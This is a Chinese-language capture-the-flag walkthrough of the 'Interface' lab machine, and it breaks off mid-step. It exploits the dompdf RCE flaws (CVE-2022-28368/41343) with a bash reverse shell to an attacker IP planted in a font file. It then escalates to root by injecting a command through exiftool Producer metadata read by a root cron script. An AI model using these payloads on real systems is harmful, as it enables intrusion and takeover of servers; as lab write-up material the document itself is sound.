01
信息收集
1.1. 端口嗅探
使用Nmap对靶机地址进行端口扫描发现靶机开放22,80端口。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ sudo nmap -sT --min-rate 10000 -p- 10.129.228.208
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-19 22:50 EDT
Warning: 10.129.228.208 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.228.208
Host is up (0.35s latency).
Not shown: 56065 closed tcp ports (conn-refused), 9468 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 102.01 seconds
继续使用-A -T4参数进行深度扫描22,80端口,获取到以下信息。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ sudo nmap -A -T4 10.129.228.208 -p 22,80
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-19 22:51 EDT
WARNING: RST from 10.129.228.208 port 22 -- is this port really open?
Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.75% done; ETC: 22:51 (0:00:00 remaining)
Nmap scan report for 10.129.228.208
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
| 256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
|_ 256 cc62905560a658629e6b80105c799b55 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site Maintenance
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.0 - 5.3 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 349.06 ms 10.10.14.1
2 349.23 ms 10.129.228.208
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds
1.2. Web服务
访问http://10.129.228.208/页面,网站返回We’ll be back soon!信息,未发现其他功能页面。通过Wappalyzer插件可以发现Web服务使用到了Next.js、React、Node.js、Webpack等组件。
获取到Web服务站点响应包内容如下。
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 20 May 2023 02:54:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
X-Powered-By: Next.js
ETag: "i8ubiadkff4wf"
Vary: Accept-Encoding
Content-Length: 6359
在响应包中Content-Security-Policy字段中发现http://prd.m.rendering-api.interface.htb网址,同样在网站源代码中发现mailto:[email protected]。
<a
href="mailto:[email protected]"
class="jsx-b59cd6f65990400b"
>
next.js属于React框架,经信息收集未发现next.js 13.0.4存在版本漏洞。
https://security.snyk.io/package/npm/next/versions?page=3
使用dirsearch工具对Web站点进行目录扫描,由于返回大量308状态码信息,使用-x 308参数进行过滤,未发现有价值的目录信息。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ dirsearch -u http://10.129.228.208/ -x 308
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/10.129.228.208/-_23-05-19_23-12-12.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-05-19_23-12-12.log
Target: http://10.129.228.208/
[23:12:14] Starting:
[23:13:54] 200 - 15KB - /favicon.ico
Task Completed
1.3. prd.m.rendering-api.interface.htb
将prd.m.rendering-api.interface.htb和interface.htb添加至/etc/hosts文件中。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# Interface
10.129.228.208 prd.m.rendering-api.interface.htb
10.128.228.208 interface.htb
访问http://prd.m.rendering-api.interface.htb/,页面返回File not found.信息。
HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 20 May 2023 03:36:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 16
File not found.
使用feroxbuster进行对http://prd.m.rendering-api.interface.htb/进行目录扫描,扫描器在Auto-filtering found 404-like response and created new filter自动过滤掉大量相同响应的404包后,返回http://prd.m.rendering-api.interface.htb/api的404包。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://prd.m.rendering-api.interface.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/
404 GET 1l 3w 50c http://prd.m.rendering-api.interface.htb/api
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor
[####################] - 3m 30000/30000 0s found:3 errors:0
[####################] - 3m 30000/30000 128/s http://prd.m.rendering-api.interface.htb/
这里返回了/api和/vendor两个目录,我们可以对这两个目录进行逐一分析。
1.3.1. /api
使用curl工具查看http://prd.m.rendering-api.interface.htb/api响应,返回"route not defined"信息,断定该地址为API接口地址。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ curl -v http://prd.m.rendering-api.interface.htb/api
* Trying 10.129.228.208:80...
* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)
> GET /api HTTP/1.1
> Host: prd.m.rendering-api.interface.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 20 May 2023 04:05:25 GMT
< Content-Type: application/json
< Transfer-Encoding: chunked
< Connection: keep-alive
<
* Connection #0 to host prd.m.rendering-api.interface.htb left intact
{"status":"404","status_text":"route not defined"}
使用feroxbuster对api进行目录扫描,指定字典为seclists字典集中的raft-large-words.txt,使用-m GET,POST指定通过GET和POST两种模式进行扫描,因为常见API接口经常会用到GET和POST两种方式。在扫描结果中发现了/html2pdf目录。
└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/api/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://prd.m.rendering-api.interface.htb/api/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET, POST]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 3w 50c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 POST 1l 3w 50c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
422 POST 1l 2w 36c http://prd.m.rendering-api.interface.htb/api/html2pdf
[####################] - 35m 239202/239202 0s found:1 errors:46
[####################] - 35m 239202/239202 112/s http://prd.m.rendering-api.interface.htb/api/
使用curl工具通过POST方式请求/api/html2pdf,页面返回{"status_text":"missing parameters"},即在使用POST请求时存在参数缺失。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ curl -X POST http://prd.m.rendering-api.interface.htb/api/html2pdf
{"status_text":"missing parameters"}
这时可以通过构造缺失的参数体进行请求,这也是API攻击典型的方式。从上面可以看到返回的信息为JSON格式,所以我们可以尝试构造JSON格式的参数'{"abc":"abc"}'。观察/api/html2pdf,根据习惯可以猜测html2pdf为API功能,且此功能为HTML向PDF转换。所以最终构造成的参数为{"html":"abc"}。使用curl -X -d命令进行请求,因为返回的二进制数据,可以使用--output -来获取返回信息。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ curl -v -X POST http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"html":"
abc
"}' --output -
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 10.129.228.208:80...
* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)
> POST /api/html2pdf HTTP/1.1
> Host: prd.m.rendering-api.interface.htb
> User-Agent: curl/7.88.1
> Accept: */*
> Content-Length: 34
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 20 May 2023 06:21:07 GMT
< Content-Type: application/pdf
< Content-Length: 1130
< Connection: keep-alive
< X-Local-Cache: hit
< Cache-Control: public
< Content-Transfer-Encoding: Binary
< Content-Disposition: attachment; filename=export.pdf
<
%PDF-1.7
1 0 obj
<< /Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R >>
endobj
2 0 obj
<< /Type /Outlines /Count 0 >>
endobj
3 0 obj
<< /Type /Pages
/Kids [6 0 R
]
/Count 1
/Resources <<
/ProcSet 4 0 R
/Font <<
/F1 8 0 R
>>
>>
/MediaBox [0.000 0.000 419.530 595.280]
>>
endobj
4 0 obj
[/PDF /Text ]
endobj
5 0 obj
<<
/Producer (��dompdf 1.2.0 + CPDF)
/CreationDate (D:20230520062044+00'00')
/ModDate (D:20230520062044+00'00')
>>
endobj
6 0 obj
<< /Type /Page
/MediaBox [0.000 0.000 419.530 595.280]
/Parent 3 0 R
/Contents 7 0 R
>>
endobj
7 0 obj
<< /Filter /FlateDecode
/Length 66 >>
stream
x��2�[email protected]&�ҹ�B�M�
�L���,L-BR��
��
B��5��5cB�\C݆�
endstream
endobj
8 0 obj
<< /Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Times-Roman
/Encoding /WinAnsiEncoding
>>
endobj
xref
0 9
0000000000 65535 f
0000000009 00000 n
0000000074 00000 n
0000000120 00000 n
0000000274 00000 n
0000000303 00000 n
0000000452 00000 n
0000000555 00000 n
0000000692 00000 n
trailer
<<
/Size 9
/Root 1 0 R
/Info 5 0 R
/ID[]
>>
startxref
801
%%EOF
* Connection #0 to host prd.m.rendering-api.interface.htb left intact
发送构造的请求,成果返回了数据。在响应包中发现我们输入的HTML被转换成了PDF格式Content-Disposition: attachment; filename=export.pdf,生成PDF用到了dompdf 1.2.0组件。
1.3.2. /vendor
使用curl工具查看http://prd.m.rendering-api.interface.htb/vendor响应,返回403 Forbidden信息。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ curl -v http://prd.m.rendering-api.interface.htb/vendor
* Trying 10.129.228.208:80...
* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)
> GET /vendor HTTP/1.1
> Host: prd.m.rendering-api.interface.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 403 Forbidden
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 20 May 2023 04:04:48 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
<
Access denied.
* Connection #0 to host prd.m.rendering-api.interface.htb left intact
使用feroxbuster对vendor目录进行目录扫描,这里使用seclists字典集中的raft-large-words.txt。扫描结束后发现dompdf和composer目录,状态码为403。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://prd.m.rendering-api.interface.htb/vendor/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/vendor/
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/composer
[####################] - 16m 119601/119601 0s found:3 errors:201
[####################] - 16m 119601/119601 119/s http://prd.m.rendering-api.interface.htb/vendor/
使用feroxbuster对vendor/dompdf/目录进行目录扫描,这里使用seclists字典集中的raft-large-words.txt。扫描结束后发现/vendor/dompdf/dompdf目录,状态码为403。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://prd.m.rendering-api.interface.htb/vendor/dompdf/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/vendor/dompdf/
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf
[####################] - 18m 119601/119601 0s found:2 errors:153
[####################] - 18m 119601/119601 109/s http://prd.m.rendering-api.interface.htb/vendor/dompdf/
继续使用feroxbuster对/vendor/dompdf/dompdf/目录进行目录扫描,发现以下信息。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/tests
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/VERSION
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.git
403 GET 1l 2w 15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.gitignore
[####################] - 16m 119601/119601 0s found:7 errors:1
[####################] - 16m 119601/119601 117/s http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/
1.4. 子域名枚举
使用wfuzz进行子域名枚举,未发现存在其他子域名信息。
┌──(kali㉿kali)-[~/Desktop/Interface]
└─$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hl 1 -H "Host: FUZZ.interface.htb" http://10.129.228.208/
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.129.228.208/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 4989
Filtered Requests: 4989
Requests/sec.: 0
02
获取www-data权限
在/api/html2pdf接口在对HTML到PDF转换时,用到了dompdf 1.2.0的组件。经过信息收集,发现该组件存在远程命令执行的漏洞CVE-2022-28368和CVE-2022-41343。
2.1. CVE-2022-28368
通过信息收集,找到以下文章帮助我们进行漏洞利用。
# 漏洞利用原理
https://positive.security/blog/dompdf-rce
https://exploit-notes.hdks.org/exploit/web/dompdf-rce/
# 漏洞利用工具
https://github.com/positive-security/dompdf-rce
将dompdf-rce漏洞利用工具下载至本地。查看exploit.css内容如下,指向exploit_font.php为漏洞利用脚本。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]
└─$ cat exploit.css
@font-face {
font-family:'exploitfont';
src:url('http://10.10.14.2:9001/exploit_font.php');
font-weight:'normal';
font-style:'normal';
}
在exploit_font.php末尾插入PHP反弹shell的脚本。& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]
└─$ cat exploit_font.php
� dum1�cmap
`�,glyf5sc��head�Q6�6hhea��($hmtxD
loca
Tmaxp\ nameD�|8dum2�
-��-����
:83#5:08��_<�
@�8�&۽
:8L��
:D
6 s
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>
使用python3开启Web服务,服务端口为9001。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]
└─$ python3 -m http.server 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
在Burpsuite中Repeater模块中,将html参数值设为,触发漏洞执行。
POST /api/html2pdf HTTP/1.1
Host: prd.m.rendering-api.interface.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 74
{"html":"<link rel=stylesheet href='http://10.10.14.2:9001/exploit.css'>"
此时存有反弹shell的exploit_font.php就被上传至了/dompdf/lib/fonts/__.php,因为和在中已声明,所以我们只要计算出http://10.10.14.2:9001/exploit_font.php的MD5,即可找到文件上传路径。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]
└─$ echo -n 'http://10.10.14.2:9001/exploit_font.php' | md5sum
d71339beac9da6cde233001997c94731 -
使用nc监听4444端口,并使用curl工具触发PHP反弹shell。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]
└─$ curl -v http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_d71339beac9da6cde233001997c94731.php --output -
* Trying 10.129.72.208:80...
* Connected to prd.m.rendering-api.interface.htb (10.129.72.208) port 80 (#0)
> GET /vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_d71339beac9da6cde233001997c94731.php HTTP/1.1
> Host: prd.m.rendering-api.interface.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
此时在nc已经接收到了shell,获取到了靶机的www-data权限。
┌──(kali㉿kali)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from prd.m.rendering-api.interface.htb [10.129.72.208] 34890
bash: cannot set terminal process group (1390): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$
2.2. CVE-2022-41343
使用cve-2022-41343漏洞利用工具同样可以获取shell,利用方式同2.1 CVE-2022-28368,但是该工具会更加的自动化。https://github.com/BKreisel/CVE-2022-41343
┌──(kali㉿kali)-[~/.local/bin]
└─$ ./cve-2022-41343 10.10.14.2 4445
░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░░░██╗██╗░░███╗░░██████╗░░░██╗██╗██████╗░
██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░░██╔╝██║░████║░░╚════██╗░██╔╝██║╚════██╗
██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗██╔╝░██║██╔██║░░░█████╔╝██╔╝░██║░█████╔╝
██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝███████║╚═╝██║░░░╚═══██╗███████║░╚═══██╗
╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░╚════██║███████╗██████╔╝╚════██║██████╔╝
░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░░░░░░╚═╝╚══════╝╚═════╝░░░░░░╚═╝╚═════╝░
PoC for CVE-2022-41343 - dompdf Version < 2.0.1
[*] CSS Payload...
@font-face {
font-family:'comicsploitz';
src:url('http://10.10.14.2:55555/comicsploitz.php');
font-weight:'normal';
font-style:'normal';
}
[*] TTF Payload :+ /dev/tcp/10.10.14.2/4445 0<&5 1>&5 2>&5'")?>
[*] CSS Link :
[*] Listener : nc -nvlp 4445
[*] Web Path : dompdf/dompdf/lib/fonts/comicsploitz_normal_a90483d8757c5671db94a1660e630450.php
[*] Server Started on 55555 (Ctrl+C to stop)
[+] Got Stage 1 Request. Sent CSS Payload 📎
[+] Got Stage 2 Request. Sent TTF Payload 🏴☠️
在/home/dev目录下找到user.txt。
[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$ cd /home
[email protected]:/home$ ls
dev
[email protected]:/home$ cd dev
[email protected]:/home/dev$ ls
user.txt
[email protected]:/home/dev$ cat user.txt
ae8491d99db6335782a2323136cd4e6e
[email protected]:/home/dev$
03
获取root权限
使用sudo -l查看www-data可以使用root权限执行的文件,提示需要输入密码,无法通过sudo -l进行提权。
www-da[email protected]:/home/dev$ sudo -l
[sudo] password for www-data:
Sorry, try again.
使用pspy64分析进程,发现~/api/vendor/dompdf/dompdf/lib目录下可写,将pspy64上传至靶机并给予执行权限。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ ls -la
total 236
drwxr-xr-x 5 www-data www-data 4096 Nov 20 21:59 .
drwxr-xr-x 6 www-data www-data 4096 Jan 16 09:49 ..
-rw-r--r-- 1 www-data www-data 221151 Nov 20 21:59 Cpdf.php
drwxr-xr-x 2 www-data www-data 4096 May 20 09:25 fonts
drwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 html5lib
drwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 res
<ndor/dompdf/dompdf/lib$ wget http://10.10.14.2:9001/pspy64
--2023-05-20 09:28:58-- http://10.10.14.2:9001/pspy64
Connecting to 10.10.14.2:9001... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'
pspy64 100%[===================>] 2.96M 956KB/s in 3.2s
2023-05-20 09:29:02 (956 KB/s) - 'pspy64' saved [3104768/3104768]
[email protected]:~/api/vendor/dompdf/dompdf/lib$ ls -la
total 3268
drwxr-xr-x 5 www-data www-data 4096 May 20 09:28 .
drwxr-xr-x 6 www-data www-data 4096 Jan 16 09:49 ..
-rw-r--r-- 1 www-data www-data 221151 Nov 20 21:59 Cpdf.php
drwxr-xr-x 2 www-data www-data 4096 May 20 09:25 fonts
drwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 html5lib
-rw-r--r-- 1 www-data www-data 3104768 May 20 09:24 pspy64
drwxr-xr-x 2 www-data www-data 4096 Nov 20 21:59 res
[email protected]:~/api/vendor/dompdf/dompdf/lib$ chmod +x pspy64
运行pspy64。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
...
2023/05/20 09:34:01 CMD: UID=0 PID=3225 | /usr/sbin/CRON -f
2023/05/20 09:34:01 CMD: UID=0 PID=3224 | /usr/sbin/CRON -f
2023/05/20 09:34:01 CMD: UID=0 PID=3226 | /bin/bash /usr/local/sbin/cleancache.sh
...
2023/05/20 09:39:01 CMD: UID=0 PID=3372 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 09:39:01 CMD: UID=0 PID=3371 | /bin/sh -c /usr/local/sbin/cleancache.sh
2023/05/20 09:39:01 CMD: UID=0 PID=3370 | /usr/sbin/CRON -f
可以看到cleancache.sh脚本是在使用exiftool工具检查/tmp/目录下文件的Producer是否为dompdf,如果不是则删除文件。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ cat /usr/local/sbin/cleancache.sh
#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
if [[ -f "$cfile" ]]; then
meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
if [[ "$meta_producer" -eq "dompdf" ]]; then
echo "Removing $cfile"
rm "$cfile"
fi
fi
done
这里用到了if [[ "$meta_producer" -eq "dompdf" ]]语句,可以通过控制$meta_producer参数的输入达到命令执行的目的。https://www.vidarholen.net/contents/blog/?p=716
通过创建test文件,使用exiftool更改文件的创建者,在里面插入whoami命令,手动执行cleancache.sh执行,发现命令成功执行返回www-data。
[email protected]:/tmp$ touch test
[email protected]:/tmp$ exiftool -Producer='a[$(whoami>&2)]' test
1 image files updated
[email protected]:/tmp$ /usr/local/sbin/cleancache.sh
www-data
Sat May 20 10:23:34 UTC 2023
[email protected]:/tmp$
可以将可控的参数改为反弹shell,通过定时任务root权限执行获得root权限的shell。在可写目录~/api/vendor/dompdf/dompdf/lib文件夹下创建反弹shell文件reverse_shell.sh,并增加执行权限。
[email protected]:~/api/vendor/dompdf/dompdf/lib$ cat reverse_shell.sh
#!/bin/bash
